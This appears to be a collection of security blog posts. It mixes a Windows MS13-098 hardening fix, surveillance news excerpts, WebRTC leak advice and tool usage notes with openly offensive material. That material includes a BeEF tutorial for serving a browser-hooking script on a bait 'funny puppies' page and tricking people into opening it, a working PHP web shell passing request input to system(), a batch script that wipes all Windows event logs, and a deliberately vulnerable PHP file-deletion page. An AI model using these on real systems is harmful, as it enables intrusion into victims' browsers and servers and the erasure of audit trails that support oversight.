Enable Windows Authenticode signature verification

Microsoft Security Bulletin MS13-098

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user or application runs or installs a specially crafted, signed portable executable (PE) file on an affected system.

This security update is rated Critical for all supported releases of Windows.

The security update addresses the vulnerability by modifying how the WinVerifyTrust function handles Windows Authenticode signature verification for portable executable files. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the vulnerability later in this bulletin.

https://technet.microsoft.com/library/security/ms13-098

 

For 32-bit versions of Microsoft Windows

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension (for example, enableAuthenticodeVerification.reg).

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"

You can apply this .reg file to individual systems by double-clicking it.

Note You must restart the system for your changes to take effect.

 

For 64-bit versions of Microsoft Windows

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension (for example, enableAuthenticodeVerification64.reg).

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"

You can apply this .reg file to individual systems by double-clicking it.

Note You must restart the system for your changes to take effect.

 

Impact of enabling the functionality changes included in the MS13-098 update. Non-conforming binaries will appear unsigned and, therefore, be rendered untrusted.

https://technet.microsoft.com/library/security/2915720

 

Tracking techniques are getting “deeper”…

As people are getting more and more aware of possible security risks, the well known surveillance firms find deeper and lower-level ways for getting access to your data.

With just a few days difference, we are hearing about possible spying firmware on our hard drives and stolen encryption keys for our SIM cards!

Pretty interesting…

 

Russian Researchers Expose Breakthrough U.S. Spying Program | 2015/02/16

(Reuters) – The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world’s computers, according to cyber researchers and former operatives.

That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations.

Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (reut.rs/1L5knm0)

… [read the whole article here]

 

The Great SIM Heist | 2015/02/19

AMERICAN AND BRITISH spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

… [read the whole article here]

How to use BeEF – Quick Tutorial

BeEF – The Browser Exploitation Framework
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Tutorial

1. Start Apache service if not running

service apache2 start

Starting Apache2 Service

2. Navigate to /var/www/ directory and remove any apache default files and folders.

3. Create an empty index.html file

Empty Index File

4. Create a folder and name it for ex. funnypuppies

5. Download and store a picture inside funnypuppies folder. The picture should contain a picture of funny puppies!

funny puppies

6. Create an index.html file inside funnypuppies folder.

7. Add the following html code in your index.html file.

Funny Puppies<script src="http://your.ip.address:3000/hook.js"></script><img src="funnypuppies.jpg" alt="" />

Html Code

8. Open BeEF. GoTo Application -> Kali Linux -> Exploitation Tools -> BeEF XSS Framework -> beef

BeEF

9. Your browser will open the address, http://127.0.0.1:3000/ui/authentication. Default BeEF username: beef, and password: beef.

BeEF Panel

10. Now you have to manipulate people to open your link, http:\\your.external.ip.address\funnypuppies.jpg. Who ever visit the link, her browser will appear in BeEF’s tree.

BeEF

Enjoy

WebRTC Vulnerability leaks Real IP Address

WebRTC Vulnerability leaks Real IP Address of VPN User.

This security flaw can reveal your real IP address, even if you’re using a VPN, and it’s easy to exploit.

To check if you are safe or not:

> Visit https://diafygi.github.io/webrtc-ips/ while you are connected to your vpn.

> If your real IP address is in the results of the test then your browser is leaking your IP.

To prevent this from happening:

For Chrome Users:
> Install this addon, https://chrome.google.com/webstore/detail/scriptsafe/oiigbmnaadbkfbmpbfijlflahbdbdgdf?hl=en.

For Firefox Users:
> Open about:config
> Locate media.peerconnection.enabled
> Set it to false

To confirm that WebRTC is disabled:

> Visit https://www.browserleaks.com/webrtc

How the NSA is tracking people

http://apps.washingtonpost.com/g/page/national/how-the-nsa-is-tracking-people-right-now/634/?tid=sm_fb

Create a Java Certificate

keytool.exe -genkey -keyalg algorithm -alias my_alias -keystore myfilename.jks -storepass my_password -validity my_days -keysize my_size
Options:
 -alias <alias>                  alias name of the entry to process
 -keyalg <keyalg>                key algorithm name
 -keysize <keysize>              key bit size
 -sigalg <sigalg>                signature algorithm name
 -destalias <destalias>          destination alias
 -dname <dname>                  distinguished name
 -startdate <startdate>          certificate validity start date/time
 -ext <value>                    X.509 extension
 -validity <valDays>             validity number of days
 -keypass <arg>                  key password
 -keystore <keystore>            keystore name
 -storepass <arg>                keystore password
 -storetype <storetype>          keystore type
 -providername <providername>    provider name
 -providerclass <providerclass>  provider class name
 -providerarg <arg>              provider argument
 -providerpath <pathlist>        provider classpath
 -v                              verbose output
 -protected                      password through protected mechanism

Example:

keytool.exe -genkey -keyalg RSA -alias myjavacert -keystore mykeystore.jks -storepass 123456qwerty -validity 365 -keysize 2048

A quick and dirty php web shell

<?php
if(isset($_REQUEST['cmd'])){
	echo "Command: <span style='color:red;'><b>".$_REQUEST['cmd']."</b></span> executed.";
	echo "<pre style='border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;'>";
	$cmd = ($_REQUEST['cmd']);
	system($cmd);
	echo "</ pre>";
	die;
}

Clear All Windows Logs

1) Create a .bat file
2) Append the following:

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

3)Run as administrator

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory:

<?php
if(isset($_GET['filename']))
{
	$filename = $_GET['filename'];
	if(file_exists($filename))
	{
		unlink($filename);
	}
}

Open your favorite browser and open url: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion

As you can see you could delete any file in the system if you provide the right path..

Dnsrecon – Kali Linux

Open your Kali linux distribution..

Enumerate a domain

dnsrecon -d example.com

Test all NS Servers in a domain for misc zone transfers

dnsrecon -d example.com -t axfr

Help!

Version: 0.8.8
Usage: dnsrecon.py <options>
 
Options:
   -h, --help                  Show this help message and exit
   -d, --domain      <domain>  Domain to Target for enumeration.
   -r, --range       <range>   IP Range for reverse look-up brute force in formats (first-last)
                               or in (range/bitmask).
   -n, --name_server <name>    Domain server to use, if none is given the SOA of the
                               target will be used
   -D, --dictionary  <file>    Dictionary file of sub-domain and hostnames to use for
                               brute force.
   -f                          Filter out of Brute Force Domain lookup records that resolve to
                               the wildcard defined IP Address when saving records.
   -t, --type        <types>   Specify the type of enumeration to perform:
                               std      To Enumerate general record types, enumerates.
                                        SOA, NS, A, AAAA, MX and SRV if AXRF on the
                                        NS Servers fail.
 
                               rvl      To Reverse Look Up a given CIDR IP range.
 
                               brt      To Brute force Domains and Hosts using a given
                                        dictionary.
 
                               srv      To Enumerate common SRV Records for a given 
 
                                        domain.
 
                               axfr     Test all NS Servers in a domain for misconfigured
                                        zone transfers.
 
                               goo      Perform Google search for sub-domains and hosts.
 
                               snoop    To Perform a Cache Snooping against all NS 
                                        servers for a given domain, testing all with
                                        file containing the domains, file given with -D
                                        option.
 
                               tld      Will remove the TLD of given domain and test against
                                        all TLD's registered in IANA
 
                               zonewalk Will perform a DNSSEC Zone Walk using NSEC Records.
 
   -a                          Perform AXFR with the standard enumeration.
   -s                          Perform Reverse Look-up of ipv4 ranges in the SPF Record of the
                               targeted domain with the standard enumeration.
   -g                          Perform Google enumeration with the standard enumeration.
   -w                          Do deep whois record analysis and reverse look-up of IP
                               ranges found thru whois when doing standard query.
   -z                          Performs a DNSSEC Zone Walk with the standard enumeration.
   --threads          <number> Number of threads to use in Range Reverse Look-up, Forward
                               Look-up Brute force and SRV Record Enumeration
   --lifetime         <number> Time to wait for a server to response to a query.
   --db               <file>   SQLite 3 file to save found records.
   --xml              <file>   XML File to save found records.
   --iw                        Continua bruteforcing a domain even if a wildcard record resolution is 
                               discovered.
   -c, --csv          <file>   Comma separated value file.
   -j, --json         <file>   JSON file.
   -v                          Show attempts in the bruteforce modes.